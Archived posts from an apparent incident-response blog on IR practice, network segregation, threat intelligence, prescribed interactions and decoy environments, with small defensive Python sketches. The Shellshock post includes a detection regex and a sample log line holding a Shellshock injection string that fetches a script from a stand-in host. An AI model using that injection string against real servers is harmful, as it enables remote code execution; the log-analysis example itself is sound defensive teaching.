https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
This is an excellent example of how to respond to a software security incident. Having worked at Microsoft for 5 years, I had the amazing experience of watching the Microsoft Security Response Center (MSRC) pioneer and then execute on Incident Response when software vulnerabilities are discovered, either by researchers or by attackers via zero days.
What struck me is not necessarily the analysis of how the bug worked, but the response procedures that were obviously defined and trained in the organization prior to this happening. Admittedly, I don't know a lot about Cloudflare, so it's possible that they developed this IR process only after some initial painful failures (that is usually the case for most organizations). Regardless, it is clear that they moved quickly and efficiently and were able to diagnose the root cause quickly. Of course, it helped that an excellent security researcher like Tavis Ormandy of Google Project Zero provided good initial information.
I was especially struck by their "global kill" flag that ships with the features they deploy (excluding the Server Side Exclude feature, which predates that kill switch). This allows them to stop catastrophic security breaches. Good foresight. It's unclear at this point what kind of disruption that might cause to operations - but given the severity of the bug, this appears to be the right call.
So, to recap:
1. Immediate response to responsible disclosure
2. The ability and wherewithal to contain the incident effectively (global kill flag) and the guts to use it.
3. The tenacity and care to start following up on all the loose ends to notify customers and clean up the residual mess
The book is still being written on this one, but based on what we've seen so far, the response by Cloudflare has been very professional.
Logos Information Security
Sunday, February 26, 2017
Saturday, February 14, 2015
Violence of Action
One of the things I've learned as an incident responder over the years is that we defenders have a very short time period in which to react to suspected attacks.
In Mandiant's seminal report on APT1, they reported that these sophisticated attackers had penetrated the target, on average, a year prior to being detected. In one of the investigations they conducted, the attacker had persisted in the network for 4 years and 10 months!
This is interesting. First off, it is really amazing that Mandiant was able to find evidence five years old. This is in contradiction to what I have been taught and what I have experienced. My guess is that it was a stroke of good luck, or that they had a very definitive indicator of compromise (IOC) and were able to get backups going back long enough to establish "patient zero." That is some excellent investigation, and a client that was willing to pay enough to let them dig back far enough.
As pointed out in Mandiant's report, digital evidence is ephemeral, which means that responding quickly to an event is paramount.
We can increase our chances of conducting a successful investigation if the local security team has done one or more of the following (or managed to get their enterprise to do the following):
- Enabled verbose logging - everywhere, ideally, but at least at the host level on critical infrastructure, servers, and other likely targets, and on all network devices and security technologies
- Created a secure, centralized logging infrastructure
- Deployed packet capture or other network surveillance technologies (NetFlow, etc.)
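To make the second point concrete, here is a minimal sketch of shipping verbose host events to a central collector over syslog. The collector address, logger name, and sample event are illustrative, not a real deployment; in practice the address would point at your secured log server.

```python
import logging
import logging.handlers

# Capture everything locally at DEBUG verbosity; filter centrally, not at the source.
logger = logging.getLogger("security")
logger.setLevel(logging.DEBUG)

# Forward events to the central syslog collector (address is illustrative).
handler = logging.handlers.SysLogHandler(address=("127.0.0.1", 514))
handler.setFormatter(logging.Formatter("%(name)s %(levelname)s %(message)s"))
logger.addHandler(handler)

logger.info("sshd: accepted login for user=alice src=10.0.4.17")
```

The point of the design is that the evidence leaves the host immediately, so an attacker who later gains root cannot quietly edit the record.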
However, the point of this post is not about doing a root cause analysis and being able to go "back in time" to identify the initial penetration. The point is about reacting quickly and "violently" to initial indicators that something is wrong in your environment.
This is something I have been thinking about a lot recently. Anyone who does security operations knows that there is a deluge of events that must be processed effectively and efficiently by security analysts. Distinguishing signal from noise is THE main issue for security operations.
[Note: I am using the term "security operations" rather than "incident responders" - in some organizations, these may not be the same people. For the purposes of this blog, security operations refers to the analysts who are engaged in incident detection.]
I don't know that I have any definitive rules for knowing when an event is an incident. But I think this is a topic that we security professionals should start discussing more. And where knowledge transfer should occur. I will be posting more about this topic in the future.
However, here are some final thoughts. In each of the APT intrusions investigated by Mandiant, I'd bet my bottom dollar that there was some indication that things were amiss. Yes, some enterprises don't even have the detective controls to look at. I wonder, though - in how many cases did an alert fire and no one looked at it? (The age-old question - if a tree falls in the forest...) We know for a fact that this happened in the Target breach.
So - when an alert fires, one certainly needs to respond quickly. My contention is that even when merely suspicious events arise, they should be quickly and fully investigated to the satisfaction of the entire security team. This may seem like an obvious point, but we should be mindful of the quality of our investigations to ensure that what we think we are seeing is in fact what we are seeing. More on this later (before I get "TL;DR'd").
Thursday, January 1, 2015
Horizontal versus Vertical Network Segregation
Originally we considered looking at security from a "ring" perspective. This shouldn't be surprising - since the beginning of time, humans have built rings for safety. The moat and the castle, especially on a hill, meant safety.
So, we have the same situation in infosec. If we create a perimeter, then ostensibly, we have security.
However, in today's networked world - we have numerous ways in which our perimeter gets distended. AWS instances, mobile devices, federated identity, BYOD - you name it.
Thinking of your network as permeable requires that you construct defenses (preventive controls) WITHIN the network - and segregating the internal network is one of those approaches. I've written about this elsewhere, but utilizing subnets for mission critical infrastructure, sensitive data and other important assets and protecting those "enclaves" is a valid strategy.
This is akin to the "tiering" approach for web applications, where web servers reside in the DMZ and are separated from middleware/business logic layers and data stores. I think of this as "horizontal segregation" where the function of the asset dictates its placement in an enclave. So a data store layer that has your databases in a secure segregated enclave would be a good example.
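As a toy sketch of this horizontal, tiered segregation (the tier names and the adjacency rule are illustrative, not a real firewall syntax): traffic is permitted only one hop "inward" between adjacent tiers, so a web server can never reach the data store directly.

```python
# Tiers ordered from least to most trusted; only adjacent-tier traffic is allowed.
TIERS = ["internet", "dmz_web", "app", "data"]

def allowed(src: str, dst: str) -> bool:
    """Permit traffic only one hop inward between adjacent tiers."""
    return TIERS.index(dst) - TIERS.index(src) == 1

print(allowed("dmz_web", "app"))   # web tier may call the app tier
print(allowed("dmz_web", "data"))  # direct web-to-database access is denied
```

In a real network the same rule set would be expressed as router ACLs or firewall policy between the enclaves; the value is that the allowed paths are enumerable and everything else is deniable by default.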
But - how about vertical segregation? If we assume that applications have multiple tiers internally, does layer 3/4 segregation mean anything anymore? We all know that firewalls and network layer controls are ineffective against web application attacks. The application allows us to interact with it over port 80/443 and allows us to touch the data store in the "back end".
From my perspective, providing security for hosting/data center solutions - vertical segregation is how we keep multiple tenants from touching each other's data. It also has the effect of isolating a particular service, website, or web application from OTHER services, websites, or web applications.
So how do we enable communication between hosts in the back end then? Do we provide a management backplane of connectivity that allows data to flow between endpoints? Or can we force all data transfers out the front door to our edge router, which then sends it to application B's "front end?"
Food for thought?
Threat intelligence, Part 2
This year has been very interesting in terms of massive, critical vulnerabilities in some of the fundamental technologies and protocols that underpin the Internet (Heartbleed and POODLE), and in some of the foundational software packages that comprise our computing platforms (Bash - Shellshock).
As a practitioner who has had to scramble around to patch these systems, some interesting artifacts arose that got me thinking about threat intelligence. In addition to patching machines, we were aware that some of these vulnerabilities had been around for some time before public disclosure. Even after public disclosure, there was some period of time before patches were available for all the affected platforms that an enterprise might have in its environment.
Which leads me to this: these types of vulnerabilities can potentially serve as a way to identify your adversaries. Think of it - if you have an adversary who wants to get into your network and a vulnerability like heartbleed or shellshock becomes known, don't you think they want to probe you immediately to see if they can use the period in between vulnerability and patch to compromise your systems?
From a vulnerability management perspective, this is why compensating controls are so important. You must protect yourself while you are waiting for that patch.
However, I would make the point that it is extremely important to also log any attempts to take advantage of the vulnerability in as verbose a fashion as possible. If you have the choice of two different compensating controls and one gives you a better view/more intelligence about the attacking party - choose that one (actually, choose both!)
Different types of attacks can provide more detailed intelligence on your attackers
Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes. Later, there were some signatures for IDS. At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution. Using it to identify your adversaries is not a winning strategy.
Shellshock gave us a lot more to go on. Attackers had to craft "attack strings" to take advantage of the vulnerability and these strings appeared in web logs. Reviewing logs could give us some idea of the attackers approach:
- Tool repositories
- Preferred commands
- Desired targets - both hosts and the files on them
Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.
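The log review described above can be sketched in a few lines. Shellshock probes embed a Bash function definition like "() { :;};" followed by the attacker's command, and that trailing command is where the TTPs live: tool repositories, preferred commands, targets. The regex and the sample log lines here are fabricated for illustration.

```python
import re

# Match the Shellshock marker "() { ... };" and capture the command after it.
SHELLSHOCK = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>[^"]+)')

# Fabricated web log lines: one probe, one benign request.
log_lines = [
    '203.0.113.9 "GET /cgi-bin/status HTTP/1.1" "() { :;}; /bin/bash -c \'wget http://198.51.100.7/kit.sh\'"',
    '198.51.100.22 "GET /index.html HTTP/1.1" "Mozilla/5.0"',
]

for line in log_lines:
    m = SHELLSHOCK.search(line)
    if m:
        # The captured command reveals the tool repository and preferred commands.
        print("probe:", m.group("cmd"))
```

Even this crude pattern surfaces the download host and the staging command, which is far more durable intelligence than the source IP alone.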
Monday, May 27, 2013
Gnothi Seauton and Prescribed Interactions
"Know thyself" is the inscription over the entry to the Oracle at Delphi.
I think "knowing thyself" from an IT service architecture and IT operations perspective is the primary indicator of whether an enterprise can defend themselves effectively from information security threats. It also is a very good predictor of how quickly they can identify, respond, contain and eventually recover from an infosec incident.
In my work as a security consultant, I find that enterprises that do the basics well are far ahead of the game in many respects, but especially when it comes to security. By basics, I mean specifically the ITIL disciplines like asset management, change management, and the like. Show me an enterprise with a 100% accurate CMDB (impossible?), and I'll show you an enterprise that will suffer less damage in an incident. I'd love to do a study of this particular issue and get some hard data on cost of breach versus ITIL practices. Maybe one of my friends in academia will contact me?
In fact, I might make the bold statement that how you do ITIL is more important than how many different security technologies you have deployed. If you have an amazing security team, but that team has no idea how many hosts are on the network, how effective do you think their vulnerability management is going to be?
I think this has big implications for Small and Medium size Businesses (SMB). Ostensibly, a smaller company with a less sweeping IT infrastructure should be able to manage their assets much more effectively on a smaller budget. Furthermore, they should be able to "baseline" their normal network behavior more accurately and therefore, be more able to identify anomalies. Oftentimes when I respond to SMB environments, the ones with the more damaging breaches are ones with outsourced IT vendors. The companies with the in-house IT personnel (especially if they're good) tend to identify their incidents themselves. In the former case, they are often finding out from VISA, if you know what I mean...
This may all be pretty obvious up to this point, but I'd like to take this to its logical extreme.
Prescribed Interactions
By "prescribed interactions", I mean pre-defined ways in which systems, users and applications interact with one another on the network. This is similar to the idea of whitelisting, but taken to the next level.
Let me give an example. If a particular enterprise has sensitive data that needs to be accessed by some subset of its users, one can develop a matrix of "prescribed interactions" with that data.
Statement 1: Normal user base can interact with sensitive data ONLY through an Intranet web application.
Statement 2: Administrators can interact with the host ONLY.
Statement 3: Database Administrators can interact with the database only. I.e., they can interact with the database directly using database management tools.
Then security controls can be applied to each "access pathway" and the statements can become more granular.
Case 1: All users have browsers that can access the Intranet web page from Subnet X. This necessitates segregating the network so that userland network segments can be readily identified and placed in ACLs on routers and firewalls to control Layer 3 access to the website. Furthermore, there will be authentication to the application. (Let's assume SSO for the enterprise). Last, let's ensure that our application developer and DBA on this app have enabled views and other controls to allow granular access to the data.
Case 2: Administrators will interact with the host by logging into a jumpbox first and then using SSH (or RDP) into the host. Backing up the data is done by... (there are any number of options here, but you get the point - whatever the tool is that does backups, you set up controls that only allow that software, using that service account, from that server, to conduct backups).
Case 3: DBAs will interact with the data by logging into jump boxes on which SQL Server Management Studio (let's assume a MS environment for the moment) is installed and use Windows authentication only.
Etc. So, what we've done is try to construct a network environment that allows our different types of users to have access to the information they need, but in a very prescribed way. If they need access remotely, then we have to factor in VPN access to the environment, but recognize that we've made an access pathway that is a little riskier here. Do we want VPN users to be lumped into userland network segments? If they have access to sensitive data, maybe it's now a requirement for two-factor authentication to be used.
Now, what I've just said is nothing new. This is the sort of analysis that most security departments conduct when working with IT to deploy new systems and technologies. What I think I'm advocating is taking it to the next level - a very thorough mapping of all of these interactions in a very conscious way. Anything other than those prescribed interactions is disallowed, and controls are instituted to prevent them from occurring. Policies are applied which explain the use cases and the prescribed interactions (especially for Admins!). Violations are immediately investigated and remediated. The implication here is that your incident detection capability is keyed on finding anomalies to the prescribed interactions. This allows you to identify attacks earlier in the "cyber kill chain."
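The statements and cases above amount to an allowlist of (actor, pathway, asset) triples. A minimal sketch, with illustrative names: everything enumerated is permitted, and any observed interaction outside the set becomes an incident lead.

```python
# Prescribed interactions as (actor, pathway, asset) triples - names are illustrative.
PRESCRIBED = {
    ("user",  "intranet_app",  "sensitive_data"),  # Statement/Case 1
    ("admin", "jumpbox_ssh",   "host"),            # Statement/Case 2
    ("dba",   "jumpbox_ssms",  "database"),        # Statement/Case 3
}

def check(actor: str, pathway: str, asset: str) -> str:
    """Classify an observed interaction: allowed, or an anomaly to investigate."""
    return "allowed" if (actor, pathway, asset) in PRESCRIBED else "investigate"

print(check("user", "intranet_app", "sensitive_data"))  # allowed
print(check("user", "direct_sql", "database"))          # anomaly -> investigate
```

The detection logic is trivially simple precisely because the hard work - enumerating the prescribed interactions - was done up front; that is the "preparation of the battlefield."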
What I've seen, especially in most SMBs, is a continued adherence to the idea that the network perimeter is a security boundary. It is not. And most infosec professionals will tell you that at this point. We're living in a world where our perimeter should be considered a semi-permeable membrane and we should assume that we've been breached at any given moment in time. But many enterprises are still thinking of the "inside" of their perimeter as trusted and thus not being very conscious of the network traffic and transactions occurring between endpoints on the network.
However, all is not lost. Using prescribed interactions is a lot like the military concept of Intelligence Preparation of the Battlefield (IPB - described here). YOU must prepare the battlefield to give you an advantage over your adversary. And this is where you theoretically have the advantage. Investigations of anomalous behavior are now possible and can be much more effective, if you've done the background work to set up the internal environment and you know what the network transactions should look like for the baseline.
Of course, this can be a daunting task - especially in larger enterprises. However, you can start with the users, transactions and systems that touch sensitive data to make it more manageable.
As my tactics instructor at the FBI used to say, "Where do you want to have a gunfight? At home, at night" - meaning that you are in a place where you know the terrain, you know the angles, the hidden alcoves, the creaky stair on the staircase. Without light, you have an even greater advantage. But that only works if you really know your own home. Sadly, most enterprises do not know their own home very well. So, I've come full circle.
Gnothi Seauton!
Tuesday, May 21, 2013
Threat Intelligence?
The term threat intelligence reminds me of the age-old joke about Military Intelligence: it's oxymoronic.
Truthfully, I don't think that is the case for either MI or for computer security threat intelligence. I think the term "threat intelligence" is ambiguous, however, and a number of security vendors have jumped into this space. It might be good to tease it out a little bit and try to figure out what it might mean and whether it adds any value when trying to defend your network.
Here's how I think about it. First as a background, I like to use the terms threat actors and threat vectors. The actor (or "agent," in some circles) is the person or organization with the motive, means and desire to attack you. The vector is the exact means by which they accomplish that.
Threat Intelligence in this context can really come from two sources:
1) an analysis of the attack vectors from a review of incident artifacts
2) penetration of threat actor groups to identify their motives, capabilities and imminent targets
For the first source, the threat intelligence is ostensibly valuable because an understanding of historical attack patterns should give an enterprise some understanding of what defenses are most effective. In my practice as a consultant, I find that this can be a good approach. It certainly has benefits in terms of managing a security program, where decisions about where to invest resources are better driven by some true understanding of the threat. One can never be 100% secure and if you can't be strong everywhere, you want to be strong where it counts.
Clearly, this approach is historical and hinges on the theory that past events can be good predictors of future events. This is somewhat true in that the basic model of how intrusions are carried out is still pretty consistent with the pattern described in the seminal Hacking Exposed books. However, given the dynamism of today's IT landscape (BYOD and Cloud immediately come to mind), new vectors are arising every day. Furthermore, it's important to note that this intelligence is primarily sourced from an analysis of data (log, forensic, malware reversing) from attacked systems.
In short, this approach is valuable, but not the whole story. I find the value is mainly in understanding the Tactics, Techniques and Procedures (TTPs) of the various criminal and APT groups, versus getting lists of bad domains, IP addresses and the like. To use the clichéd phrase, it's all about actionable intelligence. I don't think those IPs and domains are actionable - by the time you know about them, it's too late in most cases. (That's not to say you shouldn't use security gateways! I'm simply saying that as a security professional, you are better served by understanding the approach of the attackers.)
As an example of what I am talking about, I think there is a great paper written by Jon Espenschied at Microsoft, which can be found here. I think threat feeds that emphasize exact details of the new vectors and how they might be deployed against your enterprise are worth looking into. There's also a very good exploration of this topic in the context of the "Cyber Kill Chain" in a paper written by the folks at Lockheed Martin, found here. I think we can be assured that these fellows have a great deal of experience dealing with APT. I may devote an entire post to that paper and some other related work.
The second approach involves penetrating the circles of likely attackers and trying to determine what they are planning. This is obviously more proactive (vice historical) and has the added advantage of potentially helping you determine if YOUR enterprise is being targeted, before or during the act. An example of this would be when Zeus or SpyEye botnet operators add certain financial institutions to their config files for credential stealing. However, I think the number of times that attacks are caught before they occur is probably small, if for no reason other than that one can attack your enterprise without attacking your infrastructure (in the example given, the bank can't keep its customers from getting Zeus - they can mitigate it a bit but can't stop it entirely.)
Furthermore, I think penetrating these groups is non-trivial. Guys like Brian Krebs have done a good job of getting some penetration of these groups, but one can assume that his credentials as a journalist may be helping. I don't know, but maybe he'll comment on that here on this blog. Brian made available on his site a good reference - the indictment of Bx1, the SpyEye creator/botherder (interesting that they charged wire fraud and not CFAA, but that's for another post.)
I call your attention to paragraph 24 in the "Overt Acts" section of the indictment. It gives one a good understanding of how these criminals come together to plot these schemes.
Another good discussion can be found here at TechRepublic, which then links to an academic paper found here.
On a final note, penetration of criminal groups is one thing - but what about APT? Aside from some of the open source intelligence gathered and presented in Mandiant's APT1 report, one suspects that this is the kind of information only the NSA and CIA could provide. It seems like we've got a long way to go before the USG figures out how to declassify stuff to provide actionable intelligence on these groups without burning their sources.
So which is more valuable? I think one needs to use both, without expecting too much out of either. But, this is a blog, so I don't have to solve the issue. Comments are welcome.
Tuesday, November 20, 2012
The Right Idea
I read a really good article today, summarizing remarks that Paul Kurtz made at the Cloud Security Alliance Congress in Orlando last week. I couldn't agree more. I am really against the idea of "hack backs" or otherwise taking aggressive actions against hackers. First and foremost, I think you lose that fight every time, unless you are a security company filled with elite hacker types who actively monitor and defend your own network. If you are a responsible business enterprise, you have better things to do than get into a war with hackers. This is classic asymmetrical warfare and they only have to be right one time for you to suffer the consequences. Look at the APT threat or even Anonymous to give yourself an idea of what a determined attacker can do with enough time. More importantly, if you have a General Counsel worth their salt, they will crack down on any attempts by the security team to conduct any activities that might land you or anyone from the senior or executive management of the company in a prison in Ukraine.
Paul's point is well taken. We'd be much better served by creating an environment that contains decoy network segments, servers, and even administrator accounts and booby-trapping those. Previously, these types of operations were prohibitively resource intensive. The advent of virtualization has made it more feasible to create these types of decoy environments without being too much of a financial burden. Of course, it will still take some time to thoughtfully "prepare the battleground" as we used to say in the Marines. However, I could envision a scenario where you take images of all of your "true" assets, remove the valuable IP and replace it with information that is modified enough to make it realistic, but removes your company's "special sauce." You could then use that to populate your decoy environment.
You can see the advantages of this approach from an incident detection standpoint. The "booby-trapping" I referred to above is the creation of a robust monitoring solution that is logging everything going on in those decoy segments. The nice bit is that your correlation logic requirements almost disappear. If anyone touches the bogus "Special Plans" file or the "SECRET_strategicfile.docx" it is an immediate escalation and investigation from the CSIRT. Good, good stuff. At that point, your monitoring then becomes a matter of watching the attacker and documenting their activities. This has incredible value when it comes to attribution as the Tactics, Techniques and Procedures (TTPs) can be very revealing if enough data is collected over a long enough time period.
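To make the "correlation logic almost disappears" point concrete, here is a minimal sketch of what decoy-file monitoring could look like. This is not a production honeypot tool; the decoy paths are hypothetical, and a real deployment would use OS-level audit facilities (Windows object access auditing, Linux auditd/inotify) rather than polling. The idea is simply that any access to a decoy asset is an alert, with no correlation required:

```python
import os

# Hypothetical decoy paths -- in this model, ANY read access is an
# immediate escalation to the CSIRT, so no correlation logic is needed.
DECOY_FILES = [
    "/decoy/Special_Plans.docx",
    "/decoy/SECRET_strategicfile.docx",
]

def snapshot(paths):
    """Record the last-access time of each decoy file that exists."""
    return {p: os.stat(p).st_atime for p in paths if os.path.exists(p)}

def check_decoys(baseline):
    """Compare current access times to the baseline; return touched decoys."""
    alerts = []
    for path, atime in baseline.items():
        current = os.stat(path).st_atime
        if current > atime:
            alerts.append(path)        # escalate straight to the CSIRT
            baseline[path] = current   # reset so each touch alerts once
    return alerts
```

A monitoring loop would call `check_decoys` on an interval and, rather than blocking the attacker, simply log and watch - which is exactly the "document their activities" posture described above.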
